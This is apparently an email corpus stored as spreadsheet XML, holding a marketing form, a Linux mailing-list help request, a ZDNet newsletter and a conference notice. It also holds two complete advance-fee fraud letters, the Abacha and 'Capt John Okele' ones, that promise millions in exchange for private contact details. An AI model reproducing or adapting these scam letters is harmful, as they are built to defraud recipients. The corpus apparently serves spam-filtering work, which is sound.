             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Company 
             Name&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#666600
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DCOMPANY_NAME&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;
             State&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#666600 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT size=3D2 name=3DSTATE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Business 
             Phone&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#666600 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DBUS_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Home 
             Phone&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DHOME_PHONE&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Email 
             Address&lt;/FONT&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#666600 
             size=3D2&gt;*&lt;/FONT&gt;&lt;/TD&gt;
           &lt;TD&gt;&lt;INPUT name=3DEMAIL&gt;&lt;/TD&gt;&lt;/TR&gt;
         &lt;TR&gt;
           &lt;TD align=3Dright width=3D"50%"&gt;&lt;FONT 
             face=3D"Arial, Helvetica, sans-serif" color=3D#000066 size=3D2=
 &gt;Type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face=3D"Arial, Helvetica, sans-serif" color=3D=
 #666600
       size=3D1&gt;=FFFFFFA9 1999-2002 CCFL &lt;BR&gt; To be removed from our distri=
 bution lists, please  
       &lt;A href=3D"mailto:d_lete78@eudoramail.com?subject=3DRemove_Conferenc=
 ing"&gt;Click 
       here.&lt;FONT color=3D#666600&gt;&lt;/A&gt;&lt;/FONT&gt;.&lt;/FONT&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TA=
 BLE&gt;&lt;/P&gt;&lt;/CENTER&gt;&lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Assistance requested(Please Read).
</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Sir/Ma, 
 I am HAJIYA MARYAM ABACHA, wife of the late Nigeria Head of State,General Sanni Abacha who died on the 8th of June, 1998 while still on active duty. l am contacting you in view of the fact that we will be of great assistance to each other likeness developing a cordial relationship. I currently have within my reach the sum of THIRTY FIVE MILLION US Dollars (US$35,000,000.00) cash which l intend to use for investment, like Real Estate Development or import/export business specifically in your country. This money came as a payback contract deal between my late husband and a Russian Firm on our countries multi-billion dollars Ajaokuta Steel Plant Project. The Russian Partners returned my husband's share of USD$35,000,000.00 after the death of my husband and lodged in my husband's security company of which l am director right now, the new Civilian Government have intensified their probe on my husband's financial and oil company. In view of these, l acted fast to withdraw the US$3!
  5,000,000.00 from the company's vault and deposited in another private security company vault within the country. I have since declared the Security Company bankrupt. No record ever existed concerning the money traceable by the government because there is no documentation showing that we received the money from the Russian. Due to the current situation in the country concerning government attitude towards my family, it has become quite impossible for me to make use of this money within. Let me refer you to the front page of This Day Newspapers of 10th March 2001. You can check it through their website : www.thisdayonline.com , click on archives,8th. june, 2001) The present government in Nigeria had frozen and seized all my bank accounts both here in Nigeria and abroad. Thus consent l shall expect you to contact me urgently to enable us discuss in detail about this transaction. Bearing in mind that your assistance is needed to transfer this fund, l proposed a percentage of 3!
  0% of the total sum to you for the expected service and assistance, 10
 % for offsetting minor expenses incurred in the course of this transaction. Your urgent response is highly needed as to stop further contacts. All correspondence must be by the email address above. l must use this opportunity to implore you to exercise the utmost indulgence to keep this matter extraordinarily confidential whatever your decision while await your prompt response. NB: Because of the security being mounted on the members of my family, l have decided that this transaction be kept in utmost secrecy, remember to include your private Telephone or fax number for easy communication. You can also contact my trusted friend and family attorney,Barrister Aishat Gidado at aishatgidado@go.com or her number 248033044180.
 Best Regards. 
 Hajia Maryam Abacha.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</si>
  <si>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[ILUG] Linux Install
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi all
 I have a prob when trying to install Linux (tried RedHat, Suse) on my
 laptop. I can start the install but after about 2min, the whole pc just
 dies.
 I know it's not a Linux prob and here is what I have encountered:
 I had the same problem when installing Win on it and eventually sorted it
 out by disabling the infrared port. I'm guessing this might be same prob
 although I'm not sure. I am very new to Linux so it's not that easy for me
 to work it out. I did manage to follow the setup procedure at one stage
 (using images on disks) and it cuts out either as it's trying to verify what
 CD-Rom I have or just after (hence my suspicion of the infrared port again).
 can anyone help ?
 thanks
 Gianni
 ************************************************************************
 This e-mail and any files transmitted with it are confidential
 and intended solely for the use of the individual or entity to
 which they are addressed. If you have received this e-mail
 in error, please notify the EPA postmaster - postmaster@epa.ie
 The opinions contained within are personal to the sender and 
 do not necessarily reflect the policy of the Environmental 
 Protection Agency.
 This footnote also confirms that this e-mail message has been
 swept by MIMEsweeper for the presence of computer viruses.
 ************************************************************************
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: **urgent assistance**
</t>
  </si>
  <si>
    <t xml:space="preserve">5, Meridian East
 Leicester LE3 2WZ 
 Leicester City, 
 United Kingdom
 Tel/Fax: 44-870-136-7079
 Date: 09/11/2002 
 FROM: CAPT JOHN OKELE 
 DEAR SIR, 
 I got your contact through a Military friend who I did training with in your country, I am Captain JOHN OKELE the former Commander of the Security Guards of the late Laurent Kabila (former President, Democratic Republic of Congo (Africa), I am presently in self-exile with my wife and one child in remote Leicester City Britain, due to threat of the present Government headed by the son of Late Laurent Kabila after my life and my family to kill, saying that I know about the death of his father.
 I assisted Late President Laurent Kabila to keep US$35M (Thirty Five Millions) in a Security company during the War in My Country.  
 Although the security company does not know the content in the boxes deposited as we deposit it as personal effects of Mr. Laurent Kabila. It is in this respect that I seek your help to assist me in the investment of these funds before the present Government headed by the son will have knowledge of this money to avoid being taking away. 
 On conclusion of this business, I shall compensate you with 45% of the fund, while 5% is mapped out for any expense we should encounter during the cause of transaction, and the remaining amount should be used to open account for my family for investment over there with your assistance. 
 I need a profitable long-term investment plan with your company or you. Your terms, suggestions and ideas are required urgently. 
 Expecting your prompt response. Also furnish me with your current E-mail address, Tel/Fax Numbers (Private) for a personal contact with you. 
 NOTE: Please you can call or fax to the line above, it belong to my cousin, as he know the confidentiality, you can reach me direct on my mail above.  
 Yours Faithfully,
 Capt JOHN OKELE
 E-mail: johnokele2@hotmail.com
 Private E-mail: johnokele@london.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Bridging the gap between Liberty and Microsoft (Tech Update)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</si>
  <si>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href="http://clickthru.online.com/Click?q=10-YU9qI9NwJAFGHOIPffACEH5fCAiR"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href="http://clickthru.online.com/Click?q=25-inepIbdXXmk_vx5ZTscR7jeQrFPR"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15, 2002&lt;/font&gt;&lt;br&gt;&lt;/div&gt;
 &lt;!--DATE--&gt;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&lt;!--LEDE ART--&gt;
            &lt;font face="arial, helvetica" size="-1"&gt;
        &lt;b&gt;David Berlind&lt;/b&gt;&lt;br&gt;
 &lt;font size="+1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=3a-QAmgIrzDr8qPoyA7JR1rqAFZcCnR" &gt;
 &lt;b&gt;Bridging the gap between Liberty and Microsoft&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 It appears that we are closer to a solution for single sign-on and identity management. But what if Microsoft chooses not to support  Liberty's specifications?
 &lt;br&gt;
      &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;&lt;font size="-1"&gt;
 	 &lt;a href="http://clickthru.online.com/Click?q=4f-Iar4IIU81vXOSE-8g-rrsLKFK0uR" &gt;
 	 &lt;b&gt;Let's look at the worst-case scenario&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;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href="http://clickthru.online.com/Click?q=64-UBOhIuLfNZMnM_ZNGWF8w6YrPhsR" &gt;White House reviews security backbone&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=79-rsQHIEBf9L3QXiXmFz_e0CvgpaFR" &gt;HP deletes e-business software&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=8e-Ve-cQCn7KTajMyUPDuYWD0V_Wy4R" &gt;Breaking the wireless speed barrier?&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=a3-qXf6QYU1qYIeGl7fQffN5r5ls4rR" &gt;Pentium 4 to power Dell budget PCs&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b9-WWcsQ-BazXpeBpSh8FdMkmoOwzlR" &gt;AMD chips at mobile, flash markets&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=ce-Sd0CQMsxOoJLDku3ufz1Jey2fP4R" &gt;Norway cancels Microsoft contract&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=e3-ze2WQkVk8Av_Y8N-JM2mPpt29erR" &gt;Hackers challenge Internet monitoring&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/b.gif" height=7 width=1&gt;&lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f8-57BSQfsXnXibFQHpiaRL6DCwoliR"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src="http://image.com.com/techupdate/i/dfarber.jpg"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size="+1"&gt;&lt;b&gt;Microsoft stresses security for Exchange&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Microsoft is readying a new Exchange Server e-mail system, with improved security, a facelift for Outlook, and better support for cell phones and other handhelds. The upcoming version, the company's first major update of the product since releasing Exchange 2000 nearly two years ago, will by default &lt;b&gt;disable certain messaging features&lt;/b&gt; to prevent hackers and virus makers from taking advantage of openings. While Microsoft's biggest nemesis in the e-mail and messaging market is &lt;b&gt;Lotus&lt;/b&gt;, the company also competes against &lt;b&gt;Novell&lt;/b&gt; and newcomer &lt;b&gt;Oracle&lt;/b&gt;, which plans to release its own e-mail and messaging software later this year. 
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=0d-3aGuIbr2qGv1Co_Nv0T0QkY6b7PR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
   &lt;!-- STORY 2 --&gt;
 &lt;font size="+1"&gt;
   &lt;b&gt;IBM puts more bite in 'Shark'&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Can IBM's release of a new top-end "Shark" &lt;b&gt;enterprise storage system&lt;/b&gt; boost the company's prospects in the depressed storage market? Big Blue has fixed many early Shark problems, improving everything from data transfer capabilities to cache size, and adding &lt;b&gt;RAID 10 support&lt;/b&gt; and Eliza self-healing features. But IBM faces the still dominant &lt;b&gt;EMC&lt;/b&gt;, which last week lured away Mark Lewis from HP to become its new CTO; and &lt;b&gt;Hitachi&lt;/b&gt;, which  still boasts the technology edge. IBM's edge is its ability to bundle Shark sales with related server and service deals.
 &lt;br&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=22-xNrrIrdA8_lbyUfuo4I9yc99NcnR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;P&gt;
 &lt;!-- STORY 3 --&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Report: Linux hack attacks on the rise&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Hackers are increasingly targeting Linux-based Web servers, while the number of successful attacks on &lt;b&gt;Windows&lt;/b&gt; systems has decreased, according to a new report.  Linux server applications are often vulnerable to attack because of &lt;b&gt;mismanagement&lt;/b&gt;, according to the study, which urges Linux system administrators to be more vigilant about patching known security bugs. 
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=37-EMLQIqzF4eb1WRhQ93KjZ6eJcneR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 4--&gt;
 &lt;font size="+1"&gt;&lt;b&gt;Frethem worm variant:  "Re: Your password!"&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 An e-mail message that promises to reveal &lt;b&gt;secret information&lt;/b&gt; with a password is a variant from the pesky Frethem worm family. Frethem.k (aka w32.frethem.k@mm) is a more robust version of Frethem.e, which uses its own SMTP engine to send e-mail using addresses obtained from infected systems. Mac and Linux users are not affected. 
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=4c-jxi2IZpIbk_UDdrAu7hgvo2AKesR" &gt;
 &lt;b&gt;Read the full story&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!--STORY 5--&gt;
 &lt;table cellpadding="0" cellspacing="0" border="0" width="85" align="right"&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;
   &lt;img src="http://techupdate.zdnet.com/techupdate/i/071502sonyclie.jpg" width="200" height="291" border="0"&gt;
 &lt;/td&gt;
                 &lt;td width=5&gt;
 &lt;img src="http://www.zdnet.com/b.gif" width=5  height=1&gt;&lt;/td&gt;
                 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;font size="+1"&gt;&lt;b&gt;An improved CLIE&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 With the CLIE PEG-T665C, Sony took everything good about the PEG-T615C--including its terrific color screen and solid design--and added a faster processor and MP3 support to make quite an &lt;b&gt;attractive Palm OS PDA&lt;/b&gt;. But with Pocket PCs now selling for less than this CLIE and a whole new Palm OS on the horizon, is this the right time to invest in the T665C?
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=62-4oBiIePgpOBJaylG9TmIKJ15BRdR" &gt;
 &lt;b&gt;Read the full review&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;
 &lt;!-- story 6 --&gt;
 &lt;!--&lt;font size="+1"&gt;&lt;b&gt;IT sees new profits in Old Glory&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Can CRM be tweaked to track terrorists? As the fight against &lt;b&gt;terrorism&lt;/b&gt; heats up, the government turns to the tech industry to come up with tools to secure the country against attack. It's an opportunity for patriotism--and for profits. (Nearly $38 billion is slated for homeland security.) Software companies big and small are sending tens of thousands of proposals to 
 government agencies, some of which are so new they don't have the budget to hire people to evaluate them all.
 &lt;br&gt;&lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=77-u6h6IIpsCMkQo7Ux31g9NPmdZPuR" &gt;
 &lt;b&gt;Read more the ZDNet News Focus&lt;/b&gt;&lt;/a&gt;
 &lt;p&gt;--&gt;
 &lt;!-- Write to me --&gt;
 &lt;img src="http://www.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0"&gt;Write me at &lt;a href="mailto:dan.farber@cnet.com"&gt;&lt;b&gt;dan.farber@cnet.com&lt;/b&gt;&lt;/a&gt;&lt;br&gt;&lt;br&gt;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href="http://clickthru.online.com/Click?q=8c-Ld7aQ6JBhMWFvk2VFm8il40AWNyR"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href="http://clickthru.online.com/Click?q=a1-AfVtQ-ZKI2GKzcdGkeHaXeD3gBlR" &gt;"Embedded XP isn't the remedy."&lt;/a&gt;&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 &lt;br&gt;&lt;br&gt;
 &lt;/font&gt;  &lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
 --&gt;
 &lt;!--end quote block--&gt;
         &lt;!-- review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href="http://clickthru.online.com/Click?q=b6-llkUQCKyZLdFrcbT_PUCch20Lg4R" &gt;
 &lt;b&gt;Handle employee relations with care&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 ERM is the latest relationship management buzzword. &lt;b&gt;Adrian Mello&lt;/b&gt; helps you get beyond the marketing hype by weighing the merits of employee portals.
  &lt;br&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
         &lt;!-- feature --&gt;
 &lt;font face="verdana, geneva" color="#666666" size="-2"&gt;&lt;b&gt;Downloads&lt;/b&gt;&lt;/font&gt;&lt;sub&gt;&amp;nbsp;&lt;/sub&gt;&lt;br&gt;
 &lt;table width="100%" cellpadding="0" cellspacing="0" border="0"&gt;&lt;tr&gt;
 &lt;td width="20"&gt;&lt;img src="http://www.zdnet.com/b.gif" width="20" height="1"&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;font size="+0"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=cc-h4fQQ0Oq562XqIQ7qeZDozn6f5yR" &gt;
 &lt;b&gt;How to defrag your hard drive--and speed up your PC&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 Looking for a quick way to rev up a sluggish system? Try defragmenting your hard drive. Since the Windows defrag tool is less than ideal, &lt;b&gt;Preston Gralla&lt;/b&gt; shows you three downloads that do a better job of it.
  &lt;br&gt;&lt;br&gt;
         &lt;/font&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/table&gt;
 		        &lt;!-- download --&gt;
         &lt;!-- /coming tomorrow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href="http://clickthru.online.com/Click?q=e1-6RvNQxk2EzJkOAuPhsYK3Awi9qlR" &gt;
 &lt;b&gt;Unplugged: FBI CIO Darwin John&lt;/b&gt;&lt;/a&gt;&lt;/font&gt;&lt;br&gt;
 In the twilight of his career, an IT veteran takes on the formidable task of transforming the FBI's &lt;b&gt;antiquated technology infrastructure&lt;/b&gt;.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size="-2"&gt;&lt;b&gt;Networking&lt;/b&gt;&lt;/font&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;/td&gt;&lt;/tr&gt;
 	&lt;tr valign="top"&gt;
 	&lt;td width="85"&gt;&lt;a href="http://clickthru.online.com/Click?q=f6-QktIQMwrV7tXLAtYYRGOT9_Jmp4R" &gt;&lt;img src="http://www.zdnet.com/products/graphics/052302gateway.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 	&lt;td width="5"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=1 width=5&gt;&lt;/td&gt;
 	&lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=0b-0NI-INQ4zFF2D66GftmZCtvxYhrR" style="text-decoration:none"&gt;&lt;b&gt;Find the right home network&lt;/b&gt;&lt;/a&gt; &lt;br /&gt;Choosing the right technology to match your networking needs is vital. Here's help in making the choice.&lt;/font&gt;&lt;/td&gt;
 	&lt;/tr&gt;
 	&lt;tr&gt;&lt;td colspan="3"&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;img src="http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0" alt="" /&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=20-PoiFIRzzEnRviy5tR-pp7us2QfiR" style="text-decoration:none"&gt;Read reviews&lt;/a&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;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&lt;b&gt;Networking&lt;/b&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="7" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;1&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=35-d6JTIbIzinohlvSKNXLTSyPWc3PR" style="text-decoration:none"&gt;Linksys EtherFast wireless AP&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;2&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=4a-HcgUIPpcJhDUcERsxoLkkTKhn-dR" style="text-decoration:none"&gt;Linksys EtherFast router&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;3&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=5f-WK5BIIKX_uvjR6i6fez6pa6cIJuR" style="text-decoration:none"&gt;Siemens SpeedStream router&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;4&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=74-VAV8IZZSX0p7Ey_RYG8Y0gSPZxsR" style="text-decoration:none"&gt;Wireless 802.11B Router&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;b&gt;5&lt;/b&gt;. &lt;a href="http://clickthru.online.com/Click?q=89-h28bQ-J1jabpVqrkUMBXB6W5WWlR" style="text-decoration:none"&gt;NetGear HE102 802.11a wireless AP&lt;/a&gt;&lt;br /&gt;&lt;img src="http://www.zdnet.com/graphics/anchordesk/frontpage/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 	&lt;img src="http://techupdate.zdnet.com/techupdate/i/arrow_blue.gif" width="8" height="10" border="0" alt="" /&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=9f-o7XMQ1JdPBdt8aEYlcGhVIlcU_eR" &gt;More popular networking products&lt;/a&gt;&lt;/b&gt;&lt;br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&lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b4-aJlbQ6Z1ubFOfpSqJzDxDXozLCyR" &gt;Need a memory upgrade? Find out with CNET's Memory Configurator.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c9-3OZLQpgkBHgu4W1jg0SxiPZvH6lR" &gt;Clearance Center: Get discounts on PCs, PDAs, MP3 players and more!&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=de-7tpkQMWawpW-tEQtTbDS-BJjho4R" &gt;Find out the top 10 Web services security requirements at Tech Update.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f3-LjwgQJOwQs3hMSvCs3CyJqsjeorR" &gt;Builder.com shows you how to bring Java to the masses with Cold Fusion MX.&lt;/A&gt;
 &lt;P&gt;
 &lt;a href="http://clickthru.online.com/Click?q=08-IFoQIRjFBeeaKm5g3F-erCpGY9iR" &gt;Check out thousands of IT job listings in ZDNet's Career Center.&lt;/A&gt;
 &lt;P&gt;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href='http://clickthru.online.com/Click?q=1d-6KwjzDQ7qgKhrDEQ2oJXCf-zCfymhRRR'&gt;Unsubscribe&lt;/a&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-zdnet@spamassassin.taint.org&amp;brand=zdnet'&gt;Manage 
         My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=32-Gx5IIrQ6QHkttRDDFWVhZSgRXBnR" &gt;FAQ&lt;/A&gt;&amp;nbsp;| 
         &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=48-ggFbIdBskdQCyNWXl_kj2ZBSJuRR"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href="http://clickthru.online.com/Click?q=5d-JN-bIK0sQdpAgMIobvZm5yGKIaZR" &gt;&lt;img src="http://www.zdnet.com/graphics/newsletters/gl_ft.gif" width=75 height=43 border=0 alt="ZDNet"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=525&gt;&lt;font face="arial, helvetica" size="-2" color="#ffffff"&gt;&lt;a href="http://clickthru.online.com/Click?q=72-R8PHIPUfKERRRgVrqMtNXjoCKqdR" style="color: #fff"&gt;Home&lt;/a&gt; |&lt;a href="http://clickthru.online.com/Click?q=87-izDOQ8naL88ZNUieplrQ8kasp4eR" style="color: #fff"&gt;eBusiness&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=9c-xt6pQanyyWiy_E1lXdIl9Oi-UiyR" style="color: #fff"&gt;Security&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=b1-YjxJQ-0ddxlbWSMr9i_f_B0NLnlR" style="color: #fff"&gt;Networking&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=c6-URF9QMLKsFFGhgkWdT_pfmeDx04R" style="color: #fff"&gt;Applications&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=db-rmY9QJEKb1buw3AvpmtTwxp6DtrR" style="color: #fff"&gt;Platforms&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=f1-MtTuQpsFWZEdeOXH3XX8owMnerlR" style="color: #fff"&gt;Hardware&lt;/a&gt; | &lt;a href="http://clickthru.online.com/Click?q=06-fP6uI482xDUSF6Nmap_vCgSyiL4R"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src="http://gserv.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136482&amp;NL=e539&amp;ISSUE=2002-07-16" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /footer --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=1c-csTinZr9A8qvweKWtSz44jD6RdRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The 3rd Annual Consult Hyperion Digital Identity Forum
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --- begin forwarded text
 User-Agent: Microsoft-Entourage/10.1.0.2006
 Date: Thu, 03 Oct 2002 07:56:39 +0100
 Subject: The 3rd Annual Consult Hyperion Digital Identity Forum
 From: "David G.W. Birch" &lt;dgw-lists@birches.org&gt;
 To: Bob Hettinga &lt;rah@shipwright.com&gt;
 Cc: Digital Bearer Settlement List &lt;dbs@philodox.com&gt;
 Dear All,
 See www.digitalidentityforum.com for more details. Speakers include
 Microsoft and Liberty Alliance, UK central and local government, law
 enforcement, financial services (Egg and RBS/NatWest), EC Research Centre, a
 psychologist and others. Look forward to seeing you there.
 Regards,
 Dave Birch.
 -- 
 -- David Birch, Director, Consult Hyperion
 -- 
 -- tel +44 (0)1483 301793, fax +44 (0)1483 561657
 -- mail dave@chyp.com, web http://www.chyp.com
 -- 
 -- See you at the 2nd Annual Digital Transactions Forum in Singapore
